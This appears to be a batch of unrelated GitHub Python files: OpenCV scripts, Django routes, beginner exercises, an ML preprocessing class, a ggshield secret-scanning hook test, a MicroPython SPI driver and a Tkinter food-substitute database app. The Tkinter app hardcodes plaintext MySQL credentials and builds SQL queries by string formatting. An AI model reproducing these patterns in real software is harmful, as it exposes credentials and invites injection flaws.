of pixels i want to shift along y axis\r\n    # the affine matrix [[1,0,x],[0,1,y]] maps each pixel (u,v) to (u+x, v+y)\r\n    transmat = np.float32([[1,0,x],[0,1,y]])\r\n    dimensions = (img.shape[1], img.shape[0])\r\n    return cv2.warpAffine(img, transmat, dimensions)\r\n\r\n# -x --> left\r\n# -y --> Up\r\n# x ---> Right\r\n# y --> Down\r\n\r\ndef asker():\r\n    x_input = int(input('Enter the pixels count to move on X-axis : '))\r\n    y_input = int(input('Enter the pixels count to move on Y-axis : '))\r\n    translated = translate(img, x_input, y_input)\r\n    cv2.imshow('translated', translated)\r\n    cv2.waitKey(5)\r\n    asker()  # keep prompting for new offsets\r\n\r\nasker()","repo_name":"ekanpycoderx/OpenCV-Project","sub_path":"transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42329294220","text":"import cv2\nimport os\n\nfileDirPath = './train/pos/'\nfileNames = os.listdir(fileDirPath) \n\ncountDict={}\nresolutionFileNames=[]\nfor filename in fileNames:\n\timg = cv2.imread(fileDirPath+filename)\n\trows,cols = img.shape[:2]\n\tresolutionStr = str(cols)+\"x\"+str(rows)\n\tif resolutionStr in countDict:\n\t\tcountDict[resolutionStr] = countDict[resolutionStr] + 1\n\telse:\n\t\tcountDict[resolutionStr] = 1\n\tif resolutionStr == '640x480':\n\t\tresolutionFileNames.append(filename)\nresolutionFileNames.sort()\n\n#print(countDict)\nwith open('result_data_name.txt','w') as f:\n\tfor item in resolutionFileNames:\n\t\tf.write(item+\"\\n\")\n\t\n","repo_name":"HyunminKo/HandGestureAuthentication","sub_path":"src/Data/data_info.py","file_name":"data_info.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17674217668","text":"from django.urls import path\n\nfrom usersApp import views\n\n\nurlpatterns = [\n\tpath('',views.main,name = 'user_main'),\n\tpath('main/',views.main,name = 'user_main'),\n\tpath('login/',views.log_in,name = 'user_login'),\n\tpath('registration/',views.registration,name = 'user_registration'),\n\tpath('logout/',views.log_out,name = 'user_logout'),\n\tpath('profile/',views.profile,name = 'user_profile')\n]\n","repo_name":"Delorency/django-first-app","sub_path":"usersApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25532167660","text":"#9. Input: a list of numbers; produce the list of their squares / use map\n\nnumbers = [1, 2, 3, 4, 5]\nprint(list(map(lambda x: x * x, numbers)))\n\n#10. Input: a list of coordinates, e.g. [(1, 1), (2, 3), (5, 3)]. Find all points that lie on the line y = 5 * x - 2. \n#Output: a dict mapping each such point to its distance from the origin (0, 0)\n\ncoords = [(1, 1), (2, 3), (5, 3)]\ndistance = {(x, y): (x ** 2 + y ** 2) ** 0.5 for x, y in coords if y == 5 * x - 2}\nprint(distance)\n\n#11. Square all even numbers from 2 to 27. Output: a list.\n\nsquare = [x * x for x in range(2, 28) if x % 2 == 0]\nprint(square)\n\n#12. Input: a list of point coordinates on the plane. Find the distance to the point farthest from the origin (0, 0) in the first quadrant. # max()\n\npoints = [(3, 1), (4, 5), (6, 2)]\nmax_distance = max((x ** 2 + y ** 2) ** 0.5 for x, y in points if x > 0 and y > 0)\nprint(max_distance)\n\n#13. Input: two lists of numbers nums_first = [1, 2, 3, 5, 8] and nums_second = [2, 4, 8, 16, 32]. Produce the pairs of sums and differences, [(3, -1), (6, -2), (11, -5), ...] 
# list(map(..., nums_first, nums_second))\n\nnums_first = [1, 2, 3, 5, 8]\nnums_second = [2, 4, 8, 16, 32]\nresult = list(map(lambda x, y: (x + y, x - y), nums_first, nums_second))\nprint(result)\n\n#14. Input: a list of strings of numbers, e.g. ['43141', '32441', '431', '4154', '43121']. Find the even squares of these numbers. Write the answer back into a list of strings, i.e. rebuild the list of strings but keep only the even squares.\n#print(list(map(int, \"1 2 3\".split())))\n\narray = ['43141', '32441', '4', '4154', '43121']\nnew_array = []\nfor i in range(len(array)):\n    if int(array[i])**2 % 2 == 0:\n        new_array.append(int(array[i]))\nresult_list = [str(x * x) for x in new_array]\nprint(result_list)\n\n#15. The manager, as usual, invented his own data layout, and it does not suit us # slice, split, map, zip\n\ninput_str = \"\"\"name,Petya,Vasya,Masha,Vova\ngrade,5,5,8,3\nsubject,math,language,physics,math\nyear,1999,2000,1995,1998\"\"\"\n\n\n#We want a normal table that we can import into csv\n\n#[\n#    {\n#        'name': 'Petya',\n#        'grade': '5',\n#        'subject': 'math',\n#        'year': '1999'\n#    },\n#    {\n#        'name': 'Vasya',\n#        'grade': '5',\n#        'subject': 'language',\n#        'year': '2000'\n#    },\n#    ...\n#]\n\n
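# One possible solution (sketch): split each row, then zip the columns back together into dicts.\nrows = [line.split(',') for line in input_str.splitlines()]\nkeys = [row[0] for row in rows]\ntable = [dict(zip(keys, values)) for values in zip(*[row[1:] for row in rows])]\nprint(table)\n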
Complited\")\n logging.info(f'Train Dataframe Head : \\n{train_data.head().to_string()}')\n logging.info(f'Test Dataframe Head : \\n{test_data.head().to_string()}')\n\n\n logging.info(\"Ontaning preprosser object\")\n\n prprocessor_obj = self.get_data_transformation_obj()\n\n target_colum_name = \"MEDV\"\n drop_columns = [target_colum_name]\n\n # this is line x & y\n input_feature_train_data = train_data.drop(drop_columns,axis=1)\n target_feature_train_data = train_data[target_colum_name]\n\n input_feature_test_data = test_data.drop(drop_columns,axis=1)\n target_feature_test_data = test_data[target_colum_name]\n\n\n ## Apply Transformation Using Preprocessor Object xtrain and xyest\n input_feature_train_arr = prprocessor_obj.fit_transform(input_feature_train_data)\n input_feature_test_arr = prprocessor_obj.transform(input_feature_test_data)\n\n logging.info(\"Applying Preprossing obj on Train and test data\")\n\n ## Convert into Array To be fast concat\n train_array = np.c_[input_feature_train_arr,np.array(target_feature_train_data)]\n test_array = np.c_[input_feature_test_arr,np.array(target_feature_test_data)]\n\n ## Calling Save object function and save preprosser pkl\n save_object(file_path=self.data_transformation_config.preprosser_obj_file_path, obj=prprocessor_obj)\n\n logging.info(\"Saving Preprocessor Pikel File\")\n\n\n return (\n train_array,\n test_array,\n self.data_transformation_config.preprosser_obj_file_path\n )\n\n \n except Exception as e:\n logging.info(\"Error Occured in the initaie data transformation\")\n raise CustomException(e,sys)\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mohiteyashprogrammer/boston_house_price_prediction","sub_path":"src/compoments/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7582655764","text":"print(\"How many numbers do you want to print?\")\na=int(input())\n\nfab1=0\nfab2=1\nfor b in range(0,a):\n print(fab1)\n sum=fab1+fab2\n fab2=fab1\n fab1=sum\n\nprint(\"Thanks for your using my program\")\n","repo_name":"prensoni0143/Python","sub_path":"Fib-series.py","file_name":"Fib-series.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22683508767","text":"from pathlib import Path\nfrom subprocess import CalledProcessError\n\nimport pytest\n\nfrom tests.conftest import GG_VALID_TOKEN\nfrom tests.functional.utils import recreate_censored_content\nfrom tests.repository import Repository\n\n\nHOOK_CONTENT = \"\"\"#!/bin/sh\nset -e\nggshield secret scan pre-receive\n\"\"\"\n\n\ndef test_scan_prereceive(tmp_path: Path) -> None:\n # GIVEN a remote repository\n remote_repo = Repository.create(tmp_path / \"remote\", bare=True)\n\n # AND a local clone\n local_repo = Repository.clone(remote_repo.path, tmp_path / \"local\")\n\n # AND ggshield installed as a pre-receive hook\n hook_path = remote_repo.path / \"hooks\" / \"pre-receive\"\n hook_path.write_text(HOOK_CONTENT)\n hook_path.chmod(0o755)\n\n # AND a secret committed\n secret_file = local_repo.path / \"secret.conf\"\n secret_content = f\"password = {GG_VALID_TOKEN}\"\n secret_file.write_text(secret_content)\n local_repo.git(\"add\", \"secret.conf\")\n local_repo.create_commit()\n\n # WHEN I try to push\n # THEN the hook prevents the push\n with pytest.raises(CalledProcessError) as exc:\n local_repo.git(\"push\")\n\n # AND the error 
message contains the leaked secret\n stderr = exc.value.stderr.decode()\n assert recreate_censored_content(secret_content, GG_VALID_TOKEN) in stderr\n\n\ndef test_scan_prereceive_branch_without_new_commits(tmp_path: Path) -> None:\n # GIVEN a remote repository\n remote_repo = Repository.create(tmp_path / \"remote\", bare=True)\n\n # AND a local clone\n local_repo = Repository.clone(remote_repo.path, tmp_path / \"local\")\n\n # Add a commit to the remote repository, otherwise git complains the branch does not\n # contain anything\n local_repo.create_commit()\n local_repo.git(\"push\")\n\n # AND ggshield installed as a pre-receive hook\n hook_path = remote_repo.path / \"hooks\" / \"pre-receive\"\n hook_path.write_text(HOOK_CONTENT)\n hook_path.chmod(0o755)\n\n # AND a branch without new commits\n branch_name = \"topic\"\n local_repo.create_branch(branch_name)\n\n # WHEN I try to push the branch\n # THEN the hook does not crash\n local_repo.git(\"push\", \"-u\", \"origin\", branch_name)\n","repo_name":"grzegorzgniadek/ggshield","sub_path":"tests/functional/secret/test_scan_prereceive.py","file_name":"test_scan_prereceive.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"40026659598","text":"import machine\nimport utime\nimport time\nimport struct\n\ndef setL2S2SPI():\n global spi1\n spi1 = machine.SPI(1,\n baudrate=100000,\n polarity=0,\n phase=1,\n bits=8,\n firstbit=machine.SPI.MSB,\n sck=machine.Pin(10),\n mosi=machine.Pin(11),\n miso=machine.Pin(12))\n \ndef boot_L2S2():\n global L2S2_TIMEOUT\n L2S2_TIMEOUT = 10\n # Assign chip select (CS) pin (and start it high)\n global spi1cs\n spi1cs = machine.Pin(13, machine.Pin.OUT)\n spi1cs.value(1)\n setL2S2SPI()\n print(myTimeNow(),\"Startup\")\n\ndef myTimeNow():\n yr, mt, d, hr, m, s, day, yrday = utime.localtime()\n yr = str(yr) if len(str(yr)) > 1 else \"0\" + str(yr)\n mt = str(mt) if len(str(mt)) > 1 else \"0\" + str(mt)\n d = str(d) if len(str(d)) > 1 else \"0\" + str(d)\n hr = str(hr) if len(str(hr)) > 1 else \"0\" + str(hr)\n m = str(m) if len(str(m)) > 1 else \"0\" + str(m)\n s = str(s) if len(str(s)) > 1 else \"0\" + str(s)\n return yr + \"-\" + mt + \"-\" + d + \" \" + hr + \":\" + m + \":\" + s\n\ndef CCITT_crc16_false(data: bytes, start, length): # ignoring start and length for now as it wasn't used\n table = [ \n 0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7, 0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,\n 0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6, 0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,\n 0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485, 0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,\n 0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4, 0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,\n 0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823, 0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,\n 0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12, 0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,\n 0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41, 0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,\n 0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70, 0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,\n 0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F, 0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 
0x4025, 0x7046, 0x6067,\n 0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E, 0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,\n 0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D, 0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,\n 0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C, 0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,\n 0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB, 0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,\n 0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A, 0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,\n 0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9, 0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,\n 0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8, 0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0\n ]\n \n crc = 0xFFFF\n for byte in data:\n crc = (crc << 8) ^ table[(crc >> 8) ^ byte]\n crc &= 0xFFFF\n return crc\n\ndef spiToL2S2(header, payload):\n global spi1\n global spi1cs\n ### Create packet for sending\n # Join together bytearrays\n hdr = bytearray(header.to_bytes(1,'little'))\n length = bytearray(len(payload).to_bytes(2,'little'))\n crc = CCITT_crc16_false(hdr + length + payload, 0, int(len(hdr + length + payload)))\n crcarray = bytearray(crc.to_bytes(2,'little'))\n packetToSend = hdr + length + crcarray + payload\n print(myTimeNow(),\"Sending \", \" \".join('{:02x}'.format(x) for x in packetToSend))\n \n\n ##### Reads spy response ######\n spi1cs.value(0)\n spi1.write(packetToSend)\n spi1cs.value(1)\n time.sleep_ms(10)\n spi1cs.value(0)\n replyHeader = b'\\x00'\n startTime = time.ticks_ms()\n while (replyHeader == b'\\x00' and time.ticks_diff(time.ticks_ms(), startTime)<(L2S2_TIMEOUT*1000)):\n spi1cs.value(0) # GSL\n replyHeader = spi1.read(1)\n time.sleep_ms(100)\n if replyHeader == b'\\x00':\n spi1cs.value(1) # GSL\n\n ##### Show response on spi #####\n replyLength = spi1.read(2)\n replyCRC = spi1.read(2)\n replyLengthVal = int.from_bytes(replyLength, 'little')\n if replyLengthVal > 0x400:\n replyLengthVal = 0x400\n replyPayload = spi1.read(replyLengthVal)\n spi1cs.value(1)\n \n crc = CCITT_crc16_false(replyHeader + replyLength + replyPayload, 0, int(len(replyHeader + replyLength + replyPayload)))\n print(myTimeNow(),\"Reply Header \", \" \".join('{:02x}'.format(x) for x in replyHeader))\n print(myTimeNow(),\"Reply Length \", \" \".join('{:02x}'.format(x) for x in replyLength))\n print(myTimeNow(),\"Reply CRC \", \" \".join('{:02x}'.format(x) for x in replyCRC))\n print(myTimeNow(),\"Reply Payload \", \" \".join('{:02x}'.format(x) for x in replyPayload))\n print(myTimeNow(),\"Calculated CRC \", \" \".join('{:02x}'.format(x) for x in crc.to_bytes(2,'little')))\n \n if crc.to_bytes(2,'little') == replyCRC :\n print(myTimeNow(),\"Received: Header \", \" \".join('{:02x}'.format(x) for x in replyHeader), \"Payload \", \" \".join('{:02x}'.format(x) for x in replyPayload))\n return replyHeader, replyPayload\n else:\n print(myTimeNow(),\"L2S2 Timeout or CRC error\")\n time.sleep(1)\n return b'\\x00', b'\\x00'\n\n\n## Takes _record_id, plate_id, _control_id as strings; _type as number 1:5; content of different types; _units as string;\n## Datatypes: 1 = bool; 2 = int; 3 = double; 4 = datetime; 5 = string\ndef data_send(_record_id, _plate_id, _control_id, _type, _content, _units):\n #Payload_diode init\n payload_diode = bytearray([0x00, 0x00, 0xFF, 0x00]) #red = (0, 0, 
255)\n\n #Diode on\n spiToL2S2(99, payload_diode)\n\n #Creation of the field id as bytearray\n _field_id = _record_id + '|' + _plate_id + '|' + _control_id + '\\0' # string terminator (see the MMDC doc)\n _field_id_b = bytearray(_field_id.encode(\"utf-8\"))\n\n #Creation of the datatype of content as byte:\n _type_b = bytearray(1)\n _type_b[0]=_type\n\n #Creation of the content as bytearray (here content is an int) \n #Need to make if options for different datatypes\n if (_type == 1):\n _content_b = bytearray([0x00])\n _content_b[0] = _content\n elif (_type == 2):\n _content_b = _content.to_bytes(4,'little')\n elif (_type == 3):\n _content_b = bytearray(struct.pack(\"d\", _content)) \n print(_content_b)\n elif (_type == 4):\n _content_b = _content.to_bytes(8,'little') #seconds since 1st Jan 1970, held as a long (64-bit C type time_t)\n print(_content_b)\n elif (_type == 5):\n _content_b = bytearray((_content + '\\0').encode(\"utf-8\"))\n\n\n #Creation of the unit name as bytearray\n _units_b = bytearray(_units.encode(\"utf-8\"))\n\n #Concatenation of the payload bytearray\n _payload=_field_id_b + _type_b + _content_b #+ _units_b\n print(f\"PAYLOAD: {_payload}\")\n #Sending of the payload to the server\n spiToL2S2(150, _payload)\n\n #Payload_diode off\n payload_diode = bytearray([0x00, 0x00, 0x00, 0x00]) #off = (0, 0, 0)\n\n #Diode off\n spiToL2S2(99, payload_diode)","repo_name":"RehanSheikh-eng/3GM1_team_3","sub_path":"L2S2/L2S2_lib.py","file_name":"L2S2_lib.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12017158520","text":"\"\"\" class Interface\"\"\"\nfrom tkinter import END, X, BOTH, Button, Frame, Label, Listbox\nimport functools\nimport math\nimport records\nimport pymysql\n\nclass Interface(Frame):\n \"\"\"\n That class creates the main frame containing all the content used to display and organize the\n data from OpenFoodFact contained in the database created by the class Database.\n The user will have the choice between two buttons, one to select the categories contained in\n the database and get a substituted from the aliments contained in the categories selected,\n the aliment substituted can be saved in the database.\n The second button display the aliments saved in the database.\n \"\"\"\n def __init__(self, fenetre, **kwargs):\n \"\"\"\n initialize the widgets and attributes necessary to use the class\n \"\"\"\n self.db = records.Database('mysql+pymysql://rayane:aaaabbbb1234@localhost/offdb')\n #variable containing the connection to the database with records\n self.connection = pymysql.connect(host='localhost',\n user='rayane',\n password='aaaabbbb1234',\n db='offdb',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n #variable containing the connection the database with pymysql\n\n\n Frame.__init__(self, fenetre, width=2000, height=1000, **kwargs)\n self.pack(fill=BOTH)\n #Create the main containing all the other widgets\n\n self.chose_a_substitute = Button(self, text=\"1-Quel aliment souhaitez-vous remplacer?\",\\\n command=self.chose_category, width=200, height=17)\n self.chose_a_substitute.pack(fill=X)\n #Button that will display the categories in the db by calling the method chose_category\n\n self.display_substitutes_saved = Button(self, text=\"2-Retrouver mes aliment substitués\",\\\n command=self.display_aliments_saved, width=200, height=17)\n self.display_substitutes_saved.pack(fill=X)\n #Button that will display the substitutes saved in the 
Database by calling\n #the method display_aliments_saved\n\n self.previous_menu = Button(text=\"Retour\", command=self.move_on_choice_menu)\n #Button that allow the user to comeback on the first menu to chose between the button\n #chose_a_substitute and display_a_substitutes_saved\n self.label = Label(self, text='Choisissez une catégorie à consulter:')\n #Label widget that display a text to make the actions to do clearer\n\n self.saving_list = Listbox(self, width=200, height=30)\n #Create the list that will contain the substitutes saved in the database\n self.categories_list = Listbox(self, width=200, height=30)\n #Create the list that will contain the categories saved in the database\n\n def display_aliments_saved(self):\n \"\"\"\n Method displaying the aliments saved in the database\n \"\"\"\n new_connection = records.Database('mysql+pymysql://rayane:aaaabbbb1234@localhost/offdb')\n\n self.chose_a_substitute.pack_forget()\n self.display_substitutes_saved.pack_forget()\n #Hide the buttons chose_a_substitute and display_substitutes_saved\n\n self.saving_list.pack(side=\"bottom\")\n self.saving_list.delete(0, END)\n #Display the listbox saving_list in the main frame and empty it before\n #getting the aliments saved from the database\n\n self.label.config(text=\"Liste des aliments substitués\", bg=\"#D6D6D6\")\n self.label.pack(side=\"top\")\n #Change the text displayed in the label and keep it at the top of the main frame\n\n self.aliments = new_connection.query('select * from saving')\n #Attribute containing all the aliments saved in the database by querying them\n #via records\n self.add_to_list(self.saving_list, self.aliments)\n #Method that add the aliments placed in argument in the list added as argument\n self.colour_list(self.saving_list, 5)\n #Method colouring the elements composing one aliment for every one on two aliments\n\n self.previous_menu.pack(side=\"bottom\")\n self.previous_menu.config(text=\"Retour\", command=self.move_on_choice_menu)\n #Place the previous_menu button at the bottom of the main frame and make sure\n #that the config of the button bring back on the first menu\n\n def colour_list(self, listname, number_of_rows_per_aliment):\n \"\"\"\n Colour the elements in the listbox to make them more visible.It colours 4\n elements every fourr elements because the informations contained on each aliment\n are displayed on 4 elements (name, where_to_buy,url and description)\n \"\"\"\n for aliment in range(int(listname.size()/number_of_rows_per_aliment)):\n #We divide by 4 the number of elements in the list coloured to know the number of\n #aliments that it contains\n if aliment%2 == 0:\n #The even aliments are not coloured\n continue\n else:\n #If not even we colour the 4 items describing the aliments in the listbox\n for line in range(number_of_rows_per_aliment):\n #for the 4 next elements\n listname.itemconfig(line+(number_of_rows_per_aliment*aliment), {'bg':'#CBCBCB'})\n #(4*item) to know where the first item of the aliment begin in the listbox\n\n def add_to_list(self, list_name, aliments):\n \"\"\"\n Add in the list chosen for the list_name argument the description of the aliments\n chosen for the aliments\n \"\"\"\n for aliment in aliments:\n list_name.insert(END, \"Nom du produit: %s \" %aliment[\"aliments_names\"])\n list_name.insert(END, \"Où l'acheter: %s\" %aliment['where_to_buy'])\n list_name.insert(END, \"URL: %s\" %aliment['OpenFoodFact_url'])\n list_name.insert(END, \"Description: %s\" %aliment['aliment_description'])\n if list_name == self.saving_list:\n 
list_name.insert(END, \"Nom aliment substitué: %s\"\\\n %aliment['name_aliment_substituted'])\n\n def move_on_choice_menu(self):\n \"\"\"\n Method to comeback on the first menu to chose between the button chose_a_substitute\n and display_a_substitutes_saved\n \"\"\"\n self.label.pack_forget()\n self.categories_list.pack_forget()\n self.previous_menu.pack_forget()\n self.saving_list.pack_forget()\n #Hide the label, the categories_list list, the previous_menu button and the saving_list list\n #because they are the widgets displayed when we want to come back to the first menu\n self.chose_a_substitute.pack(fill=X)\n self.display_substitutes_saved.pack(fill=X)\n #Display the buttons of the first menu : chose_a_substitute and display_substitutes_saved\n\n def move_on_categories_menu(self):\n \"\"\"\n Method to comeback on the menu where we can choose from which category we want to\n display the aliments saved in the database\n \"\"\"\n self.aliments_list.pack_forget()\n #Hide the list displaying the aliments\n self.categories_list.pack(side=\"bottom\")\n self.categories_list.bind('',\\\n functools.partial(self.get_aliments, nutrition_grade=\"e\"))\n #Display the list containing the categories and bind to the elements in the listbox\n #the method get_aliments that will get the aliments from the category selected\n #with a nutrition_grade of \"e\"\n self.label.config(text=\"Cliquez sur une catégorie pour voir ses aliments:\")\n self.previous_menu.config(command=self.move_on_choice_menu)\n #Change the method call by the previous_menu button to move_on_choice_menu because the\n #user will be in the category menu after the call of move_on_categories_menu\n\n def move_on_results_menu(self):\n \"\"\"\n Method to move back in the menu where we can choose which aliment we want\n to get a substitute from.\n \"\"\"\n self.saving_button.pack_forget()\n self.substitute_list.pack_forget()\n #Hide the widgets saving_button and substitute_list\n self.label.config(text=\"Choisissez l'aliment à substituer avec la souris\", bg=\"#D6D6D6\")\n self.aliments_list.pack(side=\"bottom\")\n #Display the list containing the aliments under the label\n self.previous_menu.pack(side=\"bottom\")\n self.previous_menu.config(text=\"Retour\", command=self.move_on_categories_menu)\n #Change the method called when the user click on the button by move_on_categories_menu\n #because once the method move_on_results_menu is called, the menu before that is the one\n #of the category to chose.\n\n def chose_category(self):\n \"\"\"\n Display the menu to chose a category by calling the categories contained in the database\n \"\"\"\n self.chose_a_substitute.pack_forget()\n self.display_substitutes_saved.pack_forget()\n #Hide the buttons of the first menu\n self.label.pack(side=\"top\", fill=X)\n self.label.config(text=\"Cliquez sur une catégorie pour voir ses aliments:\")\n #display the message asking the user to chose a category to see the aliments of\n self.categories_list.delete(0, END)\n self.categories = self.db.query('select * from categories')\n self.categories_list.pack(fill=BOTH)\n for category in self.categories:\n self.categories_list.insert(END, category[\"categories_names\"])\n self.categories_list.bind('',\\\n functools.partial(self.get_aliments, nutrition_grade=\"e\"))\n #Empty the content of the categories_list listbox, then get the categories contained in,\n #the database displayed the listbox, add the categories names as elements of the listbox\n #categories_list and bind the method get_aliments to the elements of the 
listbox\n\n self.previous_menu.pack(side=\"bottom\")\n\n def get_aliments(self, evt, nutrition_grade):\n \"\"\"\n Method getting the aliments depending of the nutrition_grade chosen in argument\n \"\"\"\n if nutrition_grade == \"e\":\n self.category_id = self.categories_list.curselection()[0] + 1\n #curselection()[0] gives the number of the first element selected in the listbox.\n #The first element of a listbox is 0, but in a database the first element begin at one.\n #So the id of the category chosen equal the number of the element chosen plus one.\n self.categories_list.pack_forget()\n #Hide the list containing the categories\n self.aliments_list = Listbox(self, width=200, height=30)\n self.aliments_list.pack(side=\"bottom\")\n #Create an place under the label the list that will contain\n #the aliments of the category chosen\n self.label.config(text=\"Cliquez sur un aliment pour voir son substitut:\",\n bg=\"#D6D6D6\")\n #Change the text of the label\n self.aliments = self.db.query('select * from aliments where nutrition_grade = \"e\" \\\n and categories_id = %s' %(self.category_id))\n self.add_to_list(self.aliments_list, self.aliments)\n self.colour_list(self.aliments_list, 4)\n #Get the aliment with a SQL query on the database via records depending of\n #the id of the category selected previously and with a nutrition_grade of e,\n # then add the aliments to the listbox aliments_list and colour the elements of the list\n self.previous_menu.config(text=\"Retour\", command=self.move_on_categories_menu)\n #Change the method call by clicking on the return button by move_on_categories_menu\n self.aliments_list.bind('', \\\n functools.partial(self.get_aliments, nutrition_grade=\"a\"))\n #Add an event on the element of aliments_list so that the method get_aliments is called\n #with \"a\" for argument to be able to display an aliment with a better nutrition grade by\n #clicking on one of the aliments in the aliments_list\n\n if nutrition_grade == \"a\":\n self.aliment_id = int(math.ceil((self.aliments_list.curselection()[0] + 1)/4))\n #The id of the element selected in the aliments_list equal the place in the list of\n #the first element selected plus one like previously seen for the category id.But this\n #time it is divided by four because each aliment is displayed on four elements of the\n #list and rounded up to get the id.If the user click on one of the four first elements,\n #he would get either 0.25, 0.50, 0.75 or 1 that would be rounded up so that for each\n #elements he would get the number 1 that is the id of the aliment selected.\n self.name_aliment_substituted = self.db.query('select aliments_names from aliments \\\n where id = %s ' %(self.aliment_id))\n self.name_aliment_substituted = self.name_aliment_substituted[0][\"aliments_names\"]\n #Once the id gotten, we query that aliment in the database via the aliment_id and\n #we keep the name of that aliment in an attribute named name_aliment_substituted\n self.label.config(text=\"Voici un substitut possible:\", bg=\"#D6D6D6\")\n self.aliments_list.pack_forget()\n #Change the label text and hide the aliment_list to replace with the substitute_list one\n self.substitute_list = Listbox(self, width=200, height=30)\n self.substitute_list.pack(side=\"bottom\")\n #Create the substitute_list and display it under the label\n self.aliments = self.db.query('select * from aliments where nutrition_grade = \"a\" \\\n and categories_id = %s ORDER BY RAND() LIMIT 1' %(self.category_id))\n #Get a random aliment from the databse with a nutrition gra 
de of a\n self.saving_button = Button(text=\"Sauvegarder en bdd\", command=self.save_in_db)\n self.saving_button.pack(side=\"left\")\n self.add_to_list(self.substitute_list, self.aliments)\n #Create a button displayed in the bottom left called saving_button\n #that will add the substitute displayed in the substitute_list inside\n #a table containing all the substitutes saved by the user\n self.previous_menu.config(command=self.move_on_results_menu)\n self.previous_menu.pack(side=\"right\")\n #Change the method called by the return button and display it in the botom right\n\n def save_in_db(self):\n \"\"\"\n Save in the table saving the substituted displayed in substitute_list\n \"\"\"\n with self.connection.cursor() as cursor:\n insert_aliments = \"\"\"INSERT INTO `saving`\n (`aliments_names`, `name_aliment_substituted`, `aliment_description`,\n `where_to_buy`, `OpenFoodFact_url`, `nutrition_grade`)\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\"\n cursor.execute(insert_aliments,\\\n (self.aliments[0][\"aliments_names\"], self.name_aliment_substituted,\\\n self.aliments[0][\"aliment_description\"], self.aliments[0][\"where_to_buy\"],\\\n self.aliments[0][\"OpenFoodFact_url\"], self.aliments[0][\"nutrition_grade\"]))\n self.connection.commit()\n #Insert into the table containing the substitutes saved the substitute displayed in substitute_list\n self.label.config(text=\"L'aliment a bien été sauvegardé\", bg=\"red\")\n #Change the label text to inform the user of the insertion in database once it is 